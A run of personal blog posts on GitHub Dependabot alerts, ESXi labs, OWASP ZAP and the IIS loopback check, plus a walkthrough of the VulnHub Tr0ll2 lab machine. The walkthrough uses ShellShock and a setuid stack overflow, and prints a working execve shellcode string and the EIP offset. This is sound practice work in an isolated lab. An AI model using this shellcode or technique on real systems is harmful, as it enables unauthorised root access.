GitHub security Alerts

I really love everything about security and I’m really intrigued by GitHub security tab that is now present on you repository. In your project usually it is disabled by default.

image

Figure 1: GitHub Security tab on your repository

If you enable it you start receiving suggestion based on code that you check in on the repository, as an example, GitHub will scan your npm packages source to find dependencies with libraries that are insecure.

When GitHub found something that require your attention, it will put a nice warning header on your project, so the alert cannot really pass unnoticed.

image

Figure 2: Security alert warning banner

If you go to the security tab you got a detailed list of the analysis, so you can put a remediation plan in motion, or you can simply dismiss if you believe that you can live with them.

image

Figure 3: Summary of security issues for the repository

Clearly you can click on any issue to have a detailed description of the vulnerability, so you can decide if you are going to fix it or simple dismiss because that issue is not relevant to you or you cannot in anyway bypass the problem.

image

Figure 4: Detailed report of security issue

If you noticed in Figure 4, you have also a nice button “Create Automated Security Fix” in the upper right part of the page, this means that not only GitHub is telling me where the vulnerability is, it sometimes can fix the code for me. Pressing the button will simply create a new Pull Request to fix that error, how nice.

image

Figure 5: Pull request with the fix for the security issue

In this specific situation it is simply a vulnerable package that is donwloaded by npm install, the change is simply bumping a library to a version that removed this vulnerability.

Actually GitHub perform a security scan on project dependencies and can present a remediation simply with nice pull requests

Using Pull request is really nice, really in the spirit of GitHub. The overall experience is really nice, the only annoying stuff is that actually the analysis seems to be done on master branch and proposed solution creates pull requests for master branch. While this is perfectly fine, the only problem I have is that, closing that pull request from the UI, it will merge this commit on the master branch, effectively bypassing GitFlow flow.

Since I’m a big fan of command line, I prefer to close that Pull request manually, so I simply issue a fetch, identify the new branch (it has annoying long name Smile) and simply checkout it as an hotfix branch

$ git checkout -b hotfix/0.3.1 remotes/origin/dependabot/npm_and_yarn/CoreBasicSample/src/MyWonderfulApp.Service/UI/tar-2.2.2
Switched to a new branch 'hotfix/0.3.1'
Branch 'hotfix/0.3.1' set up to track remote branch 'dependabot/npm_and_yarn/CoreBasicSample/src/MyWonderfulApp.Service/UI/tar-2.2.2' from 'origin'.

With this commands I simply checkout the remote branch as hotfix/0.3.1, so I can simply issue a git flow hotfix finish and pushing everything back to the repository.

If you have a specific flow for hotfixes, like GitFlow, it is quite easy closing Pull Requests locally, following your process, GitHub will automatically detect that the PR is closed after the push.

Now branch is correctly merged

image

Figure 6: Pull request manually merged.

If you really like this process, you can simply ask GitHub to automatically create pull requests without your intervention. As soon as a security fix is present, a PR will be created.

image

Figure 7: You can ask to receive automated pull request for all vulnerabilities

Et voilà, it is raining pull requests

image

Figure 8: A series of Pull requests made to resolve security risks

This raise another little issue, we have a single PR for each vulnerability, so, if I want to apply all of them in a unique big hotfix, I only need to manually start the hotfix, then fetch all those branches from the repo and finally cherry-pick all the commits. This operation is easy because each Pull Request contains a single commit that fixes a single vulnerability issue. Sequence of command is:

git flow hotifx start 0.3.2
git cherry-pick commit1
git cherry-pick commit2
git cherry-pick commit3
git flow hotfix finish

Final result is an hotfix resulted from cherry-picking of three distinct PR.

image

Figure 9: Three of pull requests were closed using simple cherry-pick

GitHub is really good in understanding that I’ve cherry-picked all commits in yellow from pull requests, because all pull requests were automatically closed after the push.

image

Figure 10: My pull requests are correctly closed even if I cherry-picked all commits manually.

Actually this functionality is really nice, in this simple repository I have really few lines of code but it helped me revealing some npm dependencies with vulnerabilities and, most important, it gave me the solution so I can immediately put a remediation in place.

Gian Maria.

Exploiting VulnHub Tr0ll2 machine

This is an unusual post, it deal on how I exploited Tr0ll2 machine of vulnhub. Practicing with real machine helps you to put in practice some of the stuff you learn on security. It was a real long time (almost 20 years) that I do not immerse myself in security, doing some exercise on the machine is good to spent some hours :).

I run all the machine in VMWare esxi servers, in an isolated network, behind a router and a firewall with a DNS on my kali linux machine. I’m pretty cautious when I run some machine in my network so it is always good for me to have a complete separate network, completely isolated from my real work network. Thanks to VmWare I can simply use the console to access the machine even if cannot contact directly through the network.

First of all I’m cheking DHCP server leases, to find the ip assigned to the troll machine an easy task.

image

Figure 1: Just check the leases /var/lib/dhcp/dhcpd.leases to find ip of tr0ll2 machine

Now a simple nmap reveals port 80, 21 and 22 opened, starting with port 80 I’ve done some checks with burp suite, but I do not find anything useful, just standard troll image.

image

Figure 2: Nothing interesting in home page.

This type of machine does not need brute force, but remembering the first machine of the series, I checked the robots.txt, it reveals a series of possible subdirectories. To avoid testing every entry manually simply save the file and then use software like dirb or OWASP DirBuster to brute force every entry in the file.

image

Figure 3: Some directories found by dirbuster

In all 4 directories we found the very same image, but saving all images on disk, one is slightly lager than the other. Using strings program you can notice a strange string embedded in the image.

image

Figure 4: String embedded in the image.

After some tentative (I’ve tried various stuff on the web site) it comes the light at the end of the tunnel, maybe y0ur_self is some file or directory in the web service, voila, another hidden directory.

image

Figure 5: Content of hidden folder, a file with anwers.

Opening the file I found some encoded strings, it seems Base64, but there are lots of internet sites that can try various encoding for you to avoid losing time.

image

Figure 6: Ok, indeed it is a Base64 string :)

First thing to do is converting all these base64 strings into standard strings, few lines of Python code solved the problem.

image

Figure7: Decode with python, as you can see I’m using Visual Studio Code for the task.

Once I’ve a nice file with lots of strings, the obvious thing to do is trying these password on ssh or ftp, sadly enough, nothing worked. I tried root for the user (I’m pretty sure that is not the user because it would be too easy), I’ve tried Tr0ll user (because of the username in the home page of the site), but nothing.

Now I need to admit I cheated, after being stuck for a while, after hydra and various other tool to brute force either ftp or ssh I’ve searched for an hint in the internet Open-mouthed smile

I was a little bit disappointed because the next step is not really logical, the ftp user is Tr0ll with Tr0ll as password, I really did not though such easy solution.

Moving on, in the ftp I found a single zip file, protected with a password. Now the nice list of strings decoded contains the password for the zip file.

image

Figure 8: Cracking zip file.

Inside zip file there is another file, a nice RSA key file, used to log into ssh

image

Figure 9: Finally a key to login with SSH

I tried user Tr0ll without any success, then, since the file is called noob, I tried the user noob (remembering the trick of the ftp) and it worked, but no console available, I was kicked out immediately.

image

Figure 10: Trolled again Sad smile

Ok, now I need to understand why the ssh server kicked me out all of the time, using –v option I can ask for a verbose diagnostics of what is happening between client and server.

image

Figure 11: Debug of my ssh connection

Output is not really informative, but I tried googling everything, especially a particular string “remote: forced command” that suggested me that the server somewhat has a command whitelist. I found that it is possible to configure SSH only to execute certain commands, so I tried different command, nothing worked.

After some other time googling, I found that ssh forced command can be vulnerable to ShellShock, I was really excited and tried to open a shell exploiting ShellShock bug.

image

Figure 12: ShellShock worked and I was really trolled

HORRAY, ShellShock worked, I’m in but I cannot use ls to list files, pwd commands works, some other command works, but ls gives me permission denied. After browsing with find, for some reason I tried dir command, and LOL dir command works like ls, as you can see in Figure 12, this was the most Troll moment of this hack, I was really shocked Open-mouthed smile.

Once in you can find some interesting folders

image

Figure 13: Finally some interesting files

I found three distinct r00t files inside three folders, all are executables, but running them has the simple result of kicking me out of the ssh for a while. After being puzzled I realized that one of the file is bigger than the other, and it is always in a different place Smile, this explain because all three kicked me out of the ssh, I’ve run the file in door1, then door2, then door3, but probably it was always the same file. As for the images with strings inside, probably the file with different size was the interesting one.

image

Figure 14: Solution is near

Ok, now I’m really frustrated. The reason is, I’ve found a file that has setuid root, and does nothing than output the string I give it as input, thus, the author expects me to perform an exploit with stack overflow, because this is the typical test program used also in books like shellcodes handbook. Uff, more than 15 years that I do not smash a stack, lots of stuff changed with ALSR and other stuff, so I decided to call a day, and give it up, I had enough fun with the machine.

……
……

After a couple of days, I had still a bitter sensation in my mouth, I was near to finish the machine, I cannot surrender. Thanks a lot to Pluralsight (you guys have tons of exceptional courses) I’ve found a course on creating exploit with metasploit, and the TOC reveals that it could be a refresher for my rusty buffer overflow knowledge. The course was great and it gives me al the tool to try to do an exploit. R00t file is 32 bit, so I’ve not to deal with 64 bit stack, it turns out that it could be easier than I though.

Step1, use metasploit utility to create a payload that allows me to locate the offset to overwrite the EIP register. The utility is pattern_create.rb and given a length (in this example 300 chars) it generates a unique string that allows me to locate the right offset.

image

Figure 15: Pattern_create.rb in action.

Now I can launch the r00t program into gdb debugger (I’ve no fancy GUI debugger with ssh and shellshock, but luckly enough I’m old enough to be familiar with command line debugger). Just run gdb r00t then after the debugger starts type run followed by the arguments, using pattern of increasing length until you crashed the program.

image

Figure 16: Debugger show the crash and the instruction that causes segmentation fault.

The situation is the following, I’ve overwritten the stack with a specific sequence of chars generated by pattern_create.rb and the offending pointer is 0x6a413969, that is now the content of the EIP register, then next instruction pointer. Now I can use another tool called pattern_offset.rb

image

Figure 17: Pattern_offset allows me to easily find the offset.

As you can see in Figure 17, with metasploit, finding the offset is a breeze, the EIP overwrite location is as offset 268. Now I simply followed the instruction of Pluralsight course, trying to have a better understaing of what happened. Using Python is really simple to generate a pattern to verify the assumption

image

Figure 18: Creating a specific pattern to verify what is in memory

Using that specific pattern allows me to verify what is in stack memory after buffer overflow.

image

Figure 19: Registers after buffer overflow

Ok, the assumptions are right, the ebp registers contain a sequence of A characters, then EIP contains a sequence of B, this confirms that the offset is good. Now I dump memory pointed by the esp register to verify what is in the stack, and I found all letter C. Everything is good and ready to run. I will done a final test, and instead of using all C after the EIP pointer I put 40 bytes of \x90 (NOP instructions). Here is the result

image

Figure 20: Memory layout pointed by esp after the overflow

As you can see from Figure 20, at memory address pointed by esp (0xbffffb10) there are my 40 NOPs and then letters C. Now I only need a payload, remembering the book Shellcodes handbook I search for a simple execve shell on exploit-db and the result is

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

This is really nice, I really love shellcode is almost magic because it is binary code that can be forced into a program to be executed. Now I verify again the layout of the memory after the overflow with this new code

image

Figure 21: Buffer overflow is almost ready.

It is really important that you do this final run with the exact length of the payload, now from Figure 21 I can easily see my 40 NOPs SLED starting at 0xbffffb60, then my shellcode. As first tentative I tried to overwrite EIP with 0xbffffb68 (Figure 22, remember that x86 are little endian); if everything is ok, after the overflow the execution will jump into my NOP Sled and finally executes the shell code, launching a new bash with user root (remember that r00t program has setuid root)

image

Figure 22: Final Shell code

I was really excited and really surprised when it works at the very first tentative. Many tank to Gus Khawaja for his course, it gave me all the information that I need.

image

Figure 23: I’m Groot Smile with tongue out

Gian Maria.

Azure DevOps and SecDevOps

One of the cool aspect of Azure DevOps is the extendibility through marketplace api, and for security you can find a nice marketplace addin called Owasp ZAP (https://marketplace.visualstudio.com/items?itemName=kasunkodagoda.owasp-zap-scan) that can be used to automate OWASP test for web application.

You can also check this nice article in MSDN https://devblogs.microsoft.com/premier-developer/azure-devops-pipelines-leveraging-owasp-zap-in-the-release-pipeline/ that explain how you can leverage OWASP ZAP analysis during a deploy with release pipeline.

REally good stuff to read / use.

Using vmWare machine when you have Hyper-V

There are lots of VM containing Demo, Labs etc around the internet and surely Hyper-V is not the primary target as virtualization system. This because it is present on desktop OS only from Windows 8, it is not free (present in windows professional) and bound to windows. If you have to create a VM to share in internet, 99% of the time you want to target vmWare or Virtual Box and a linux guest system (no license needed). Since Virtual Box can run vmWare machine with little problem, vmWare is de-facto the standard in this area.

Virtual Machines with demo, labs etc that you find in the internet are 99% targeted to vmWare platform.

In the past I’ve struggled a lot with conversion tools that can convert vmWare disk formats to Hyper-V format, but sometimes this does not work because virtualized hardware is really different from the two systems.

If you really want to be productive, the only solution I’ve found is installing an ESXi server on an old machine, an approach that gives me lots of satisfaction. First of all you can use the Standalone conversion tool of vmware to convert a vmWare VM to OVF standard format in few minutes, then upload the image to your ESXi server and you are ready to go.

image

Figure 1: A simple command line instruction convert VM into OVF format

image

Figure 2: From the esxi interface you can choose to create a new VM from OVF file

Once you choose the ofv file and the disk file you just need to specify some basic characteristics for the VM and then you can simply let the browser do the rest, your machine will be created into your ESXi node.

image

Figure 3: Your VM will be created directly from your browser.

The second advantage of esxi is that it is a real mature and powerful virtualization system available for Freee. The only drawback is that it needs a serious Network Card, it will not work with a crappy card integrated into a consumer Motherboard. For my ESXi test instance I’ve used my old i7-2600K with a standard P8P67 Asus motherboard (overclocked) and then I’ve spent a few bucks (50€ approx) to buy a used network card 4xGigabit. This gives me four independent NICs, with a decent network chip, each one running at 1Gbit. Used card are really cheap, especially because there are no driver for latest operating system so they are thrown away on eBay for few bucks. When you are using a Virtual Machine to test something that involves networks, you will thanks ESXi and decent multiple NIC card because you can create real network topology, like having 3 machines each one using a different NIC and potentially connected to different router / switch to test a real production scenario.

ESXi NIC virtualization is FAR more powerful than Virtual Box or even vmWare Workstation when installed with a real powerful NIC. Combined with multiple NIC card you have the ability to simulate real network topologies.

If you are using Linux machine, vmWare environment has another great advantage over Hyper-V, it supports all resolutions, you are not limited to Full-Hd with manual editing of grub configuration, you can change your resolution from Linux control panel or directly enable live resizing with the Remote Console available in ESXi.

If you really want to create a test lab, especially if you want to do security testing, having one or more ESXi hosts is something that pays a lot in the long distance.

Gian Maria

The Dreadful IIS Loopback Check

This is something that from times to times bites me, both as TFS Consultant and when I’m developing code. The problem is the following: you have a site hosted with IIS in the computer you are logged in, the site has windows authentication, but you cannot login using a FQDN, but only with localhost.

This is a Security Feature, because it avoid a reflection attack if the machine gets compromised. Sometimes this is annoying when you develop, because you are usually using your IIS machine to host site while you are developing, accessing it with localhost; then it is necessary to verify that everything works with real site names. For this reason I usually modify my hosts file to create alias like www.myproduct.local that points to 127.0.0.1 and here comes the problems.

If you use Forms authentication in ASP.NET you are ready to go, but if you enable windows authentication, the  symptom is that your browser continue to ask for password, because you will get a permanent 401 response.

A typical symptom of Loopback Check is when your site do not accept windows authentication when accessed with a FQDN, but works perfectly using localhost

If you legitimate want that www.myproduct.local points to localhost, and you want to use your NTLM/Kerberos credentials, you can follow the instruction on this link. I really like the answer in that link because I’ve found many other place that suggests to disable the Loopback Check entirely (Wrong choice from security points of view). In that link you are pointed to the right solution: specifying only the FQDN names that you want to exclude from the loopback check. In my situation I can disable www.myproduct.local while maintaining the security check for everything else.

If you have problem accessing TFS instance from the server where the Application tier is installed  do not disable Loopback Check, browse from another computer or disable check for only the real FQDN name.

Pretty please, resist the urge to disable security features, especially if this is your Team Foundation Server production instance. Avoid accessing the web interface from the AT, or disable Loopback check only for the real FQDN, but avoid turn off entirely security feature (like Loopback Check) on your production server.

Gian Maria.